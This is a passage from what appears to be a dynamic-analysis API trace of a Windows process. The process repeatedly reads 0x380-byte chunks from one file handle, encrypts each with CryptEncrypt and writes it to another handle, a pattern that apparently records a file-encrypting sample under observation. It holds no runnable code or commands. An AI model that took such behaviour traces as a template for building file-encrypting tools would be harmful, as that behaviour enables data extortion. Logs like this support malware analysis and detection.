nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0270.125] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0270.125] CryptEncrypt (in: hKey=0x2fa648, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0270.125] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0270.125] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0270.125] CryptEncrypt (in: hKey=0x2fa648, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0270.125] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0270.125] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0270.126] CryptEncrypt (in: hKey=0x2fa648, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0270.126] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0270.126] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0270.126] CryptEncrypt (in: hKey=0x2fa648, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0270.126] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0270.126] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0270.126] CryptEncrypt (in: hKey=0x2fa648, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0270.126] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0270.126] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0270.126] CryptEncrypt (in: hKey=0x2fa648, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0270.126] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0270.127] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0270.127] CryptEncrypt (in: hKey=0x2fa648, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0270.127] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0270.127] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0270.127] CryptEncrypt (in: hKey=0x2fa648, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0270.127] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0270.127] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0270.127] CryptEncrypt (in: hKey=0x2fa648, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0270.127] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0270.127] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0270.128] CryptEncrypt (in: hKey=0x2fa648, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0270.128] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0270.128] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0270.128] CryptEncrypt (in: hKey=0x2fa648, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0270.128] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0270.128] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0270.128] CryptEncrypt (in: hKey=0x2fa648, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0270.128] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0270.128] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0270.128] CryptEncrypt (in: hKey=0x2fa648, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0270.128] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0270.128] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0270.129] CryptEncrypt (in: hKey=0x2fa648, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0270.129] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0270.129] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0270.129] CryptEncrypt (in: hKey=0x2fa648, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0270.129] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0270.129] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0270.129] CryptEncrypt (in: hKey=0x2fa648, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0270.129] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0270.129] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0270.129] CryptEncrypt (in: hKey=0x2fa648, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0270.129] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0270.129] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0270.130] CryptEncrypt (in: hKey=0x2fa648, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0270.130] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0270.130] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0270.130] CryptEncrypt (in: hKey=0x2fa648, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0270.130] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0270.130] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0270.130] CryptEncrypt (in: hKey=0x2fa648, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0270.130] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0270.130] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0270.130] CryptEncrypt (in: hKey=0x2fa648, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0270.130] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0270.131] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0270.131] CryptEncrypt (in: hKey=0x2fa648, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0270.131] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0270.131] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0270.131] CryptEncrypt (in: hKey=0x2fa648, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0270.131] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0270.131] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0270.131] CryptEncrypt (in: hKey=0x2fa648, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0270.131] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0270.131] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0270.132] CryptEncrypt (in: hKey=0x2fa648, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0270.132] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0270.132] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0270.132] CryptEncrypt (in: hKey=0x2fa648, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0270.132] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0270.132] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0270.132] CryptEncrypt (in: hKey=0x2fa648, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0270.132] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0270.132] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0270.132] CryptEncrypt (in: hKey=0x2fa648, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0270.133] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0270.133] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0270.133] CryptEncrypt (in: hKey=0x2fa648, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0270.133] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0270.133] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0270.133] CryptEncrypt (in: hKey=0x2fa648, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0270.133] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0270.133] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0270.133] CryptEncrypt (in: hKey=0x2fa648, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0270.133] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0270.133] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0270.134] CryptEncrypt (in: hKey=0x2fa648, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0270.134] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0270.134] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0270.134] CryptEncrypt (in: hKey=0x2fa648, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0270.134] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0270.134] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0270.134] CryptEncrypt (in: hKey=0x2fa648, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0270.134] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0270.134] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0270.135] CryptEncrypt 